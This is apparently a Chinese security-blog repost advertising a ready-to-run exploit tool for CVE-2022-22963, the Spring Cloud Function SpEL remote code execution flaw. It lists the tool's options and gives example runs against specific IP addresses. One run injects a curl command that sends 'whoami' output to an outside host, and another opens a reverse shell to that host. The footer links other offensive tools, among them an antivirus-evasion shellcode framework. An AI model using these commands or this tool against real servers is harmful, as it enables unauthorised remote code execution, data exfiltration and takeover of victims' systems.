CVE-2022-22963 (spring cloud function sple rce)一键利用工具

admin

101095
文章

87
评论

2023年3月13日08:06:27评论70 views字数 1073阅读3分34秒阅读模式

CVE-2022-22963 (spring cloud function sple rce)-spring cloud function 一键利用工具! by charis-博客http://www.charis3306.top/

已打包为exe文件开箱即用

命令主题

usage: Spring-cloud-function-spel0.2.exe [-h] --check CHECK [--route ROUTE] --url URL [--ip IP] [--port PORT] [--proxies PROXIES] [--cmd CMD]
spring cloud function 一键利用工具! by charis 博客http://www.charis3306.top/
options:  -h, --help         show this help message and exit  --check CHECK      检测方式post或get方式,--check get --check post  --route ROUTE      检测路由，默认是functionRouter  --url URL          输入利用的url  --ip IP            反弹shell地址ip  --port PORT        反弹shell地址端口  --proxies PROXIES  启用代理  --cmd CMD          要执行的命令

--check 是必选项

所用帮助主题

.Spring-cloud-function-spel0.2.exe --help

CVE-2022-22963 (spring cloud function sple rce)一键利用工具

默认检测--check 是必须选，--route是漏洞存在的路由。注意如果不借助dnslog 或sleep 进行探测会存有误报！

.Spring-cloud-function-spel0.2.exe --check post --url http://www.charis3306.top

CVE-2022-22963 (spring cloud function sple rce)一键利用工具

执行命令验证是否能利用

.Spring-cloud-function-spel0.2.exe --check post --url http://154.83.15.150:8080/ --cmd "curl http://154.211.12.40:9999/`whoami`"

CVE-2022-22963 (spring cloud function sple rce)一键利用工具

反弹shell

.Spring-cloud-function-spel0.2.exe --check post --url http://154.83.15.150:8080/ --ip 154.211.12.40 --port 9999

CVE-2022-22963 (spring cloud function sple rce)一键利用工具

项目地址：https://github.com/charis3306/CVE-2022-22963

原文始发于微信公众号（Ots安全）：CVE-2022-22963 (spring cloud function sple rce)一键利用工具

左青龙
微信扫一扫

右白虎
微信扫一扫

CVE-2022-22963 (spring cloud function sple rce)一键利用工具

Burpsuite被动探测与递归目录探测插件|漏洞探测

Mediy资源丰富的在线私人网盘

dicttools！社工密码字典生成工具

红蓝对抗快速搭建基础设施平台

一款使用简单的批量信息收集,供应链漏洞探测工具

0xsp Mongoose：权限提升枚举工具包，使用Web API快速智能枚举

Thinkphp(GUI)漏洞利用Tools（附下载）

常用的网络安全靶场、工具箱、学习路线推荐

一键生成免杀木马的 shellcode 免杀框架

工具 | 命令执行不回显但DNS协议出网的命令回显场景解决方案

发表评论

在线咨询

微信